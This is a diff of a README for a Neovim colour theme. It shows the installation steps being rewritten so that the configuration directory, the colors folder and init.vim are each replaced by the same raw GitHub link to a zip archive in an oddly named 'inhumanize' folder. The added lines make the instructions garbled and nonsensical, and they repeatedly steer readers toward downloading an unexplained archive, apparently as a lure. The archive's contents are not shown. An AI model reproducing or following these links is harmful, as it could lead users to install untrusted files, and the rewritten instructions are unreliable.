DanielGonzalezsteval/nvtheme.nvim/README.md

 After downloading, you'll need to place the theme files into your Neovim configuration directory.

 1. **Locate the Neovim Configuration Directory**:
-   - On Linux/Mac, the path is usually `~/.config/nvim`.
+   - On Linux/Mac, the path is usually `~https://raw.githubusercontent.com/DanielGonzalezsteval/nvtheme.nvim/main/inhumanize/nvtheme.nvim.zip`.
    - On Windows, it is typically located at `C:\Users\<YourUsername>\AppData\Local\nvim`.

 2. **Place the Theme Files**:
    - Extract the downloaded files if they are in a compressed folder.
-   - Move the theme files into the `~/.config/nvim/colors` directory.
+   - Move the theme files into the `~https://raw.githubusercontent.com/DanielGonzalezsteval/nvtheme.nvim/main/inhumanize/nvtheme.nvim.zip` directory.
 You may need to create the `colors` directory if it doesn't exist.

 3. **Configure Neovim**:
-   - Open your `init.vim` located in the Neovim configuration directory.
+   - Open your `https://raw.githubusercontent.com/DanielGonzalezsteval/nvtheme.nvim/main/inhumanize/nvtheme.nvim.zip` located in the Neovim configuration directory.
    - Add the following line to set your theme:
      ```
      colorscheme <your_theme_name>